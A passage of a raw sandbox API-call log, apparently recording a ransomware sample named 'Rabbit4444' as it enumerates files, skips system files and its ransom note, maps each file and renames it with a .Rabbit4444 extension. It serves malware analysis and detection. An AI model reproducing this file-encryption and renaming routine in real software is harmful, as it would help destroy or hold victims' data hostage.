(lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2=".") returned 1 [0058.931] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="..") returned 1 [0058.931] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="windows") returned -1 [0058.931] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.931] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.931] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="boot") returned 1 [0058.931] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.931] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.931] lstrcpyW (in: lpString1=0x130ec22, lpString2="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms" | out: lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms") returned="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms" [0058.931] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.931] lstrlenW (lpString="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms") returned 64 [0058.931] lstrlenW (lpString="Rabbit4444") returned 10 [0058.931] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.931] lstrlenW (lpString=".dll") returned 4 [0058.931] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.931] lstrlenW (lpString=".lnk") returned 4 [0058.931] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.931] lstrlenW (lpString=".ini") returned 4 [0058.931] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.931] lstrlenW (lpString=".sys") returned 4 [0058.931] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.931] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.932] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.932] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15024257089) returned 1 [0058.932] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1118) returned 1 [0058.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0058.932] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0058.933] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0058.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.934] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.934] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.934] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.934] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.934] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15024526337) returned 1 [0058.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0058.935] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.935] CloseHandle (hObject=0x298) returned 1 [0058.935] CloseHandle (hObject=0x278) returned 1 [0058.935] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms.Rabbit4444") returned 192 [0058.935] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.936] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5093b894, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5093b894, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230c53a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", cAlternateFileName="CL6216~1.SET")) returned 1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2=".") returned 1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="..") returned 1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="windows") returned -1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="boot") returned 1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.936] lstrcmpiW (lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.936] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms" | out: lpString1="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms") returned="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms" [0058.936] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.936] lstrlenW (lpString="Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms") returned 64 [0058.936] lstrlenW (lpString="Rabbit4444") returned 10 [0058.936] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.936] lstrlenW (lpString=".dll") returned 4 [0058.936] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.936] lstrlenW (lpString=".lnk") returned 4 [0058.936] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.936] lstrlenW (lpString=".ini") returned 4 [0058.936] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.937] lstrlenW (lpString=".sys") returned 4 [0058.937] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.937] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{68f4f33c-658c-4278-94c1-22b8e653f3e8}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.937] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.937] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15024767478) returned 1 [0058.937] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1114) returned 1 [0058.937] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.937] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.937] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0058.938] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0058.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.940] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15025032607) returned 1 [0058.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.940] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.940] CloseHandle (hObject=0x298) returned 1 [0058.940] CloseHandle (hObject=0x278) returned 1 [0058.940] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms.Rabbit4444") returned 192 [0058.940] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{68f4f33c-658c-4278-94c1-22b8e653f3e8}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{68f4f33c-658c-4278-94c1-22b8e653f3e8}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.941] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50adf2de, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x50adf2de, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2222ad59, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", cAlternateFileName="CL499A~1.SET")) returned 1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2=".") returned 1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="..") returned 1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="windows") returned -1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="boot") returned 1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.941] lstrcmpiW (lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.941] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms" | out: lpString1="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms") returned="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms" [0058.941] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.941] lstrlenW (lpString="Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms") returned 64 [0058.941] lstrlenW (lpString="Rabbit4444") returned 10 [0058.941] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.941] lstrlenW (lpString=".dll") returned 4 [0058.941] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.941] lstrlenW (lpString=".lnk") returned 4 [0058.941] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.941] lstrlenW (lpString=".ini") returned 4 [0058.941] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.942] lstrlenW (lpString=".sys") returned 4 [0058.942] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.942] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{693e4ef4-9060-469b-ab2e-948b6b68a883}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.942] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.942] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15025265098) returned 1 [0058.942] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=923) returned 1 [0058.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0058.942] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0058.943] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0058.944] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.944] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.944] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.944] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.945] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15025564183) returned 1 [0058.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0058.945] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.945] CloseHandle (hObject=0x298) returned 1 [0058.945] CloseHandle (hObject=0x278) returned 1 [0058.945] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms.Rabbit4444") returned 192 [0058.945] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{693e4ef4-9060-469b-ab2e-948b6b68a883}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{693e4ef4-9060-469b-ab2e-948b6b68a883}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.946] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50c82cb2, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x50c82cb2, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", cAlternateFileName="CLF161~1.SET")) returned 1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2=".") returned 1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="..") returned 1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="windows") returned -1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="boot") returned 1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.946] lstrcmpiW (lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.946] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms" | out: lpString1="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms") returned="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms" [0058.946] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.947] lstrlenW (lpString="Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms") returned 64 [0058.947] lstrlenW (lpString="Rabbit4444") returned 10 [0058.947] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.947] lstrlenW (lpString=".dll") returned 4 [0058.947] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.947] lstrlenW (lpString=".lnk") returned 4 [0058.947] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.947] lstrlenW (lpString=".ini") returned 4 [0058.947] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.947] lstrlenW (lpString=".sys") returned 4 [0058.947] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.947] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{693e4ef5-9060-469b-ab2e-948b6b68a883}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.947] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.947] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15025807499) returned 1 [0058.947] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=925) returned 1 [0058.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0058.947] CreateFileMappingW (hFile=0x278, 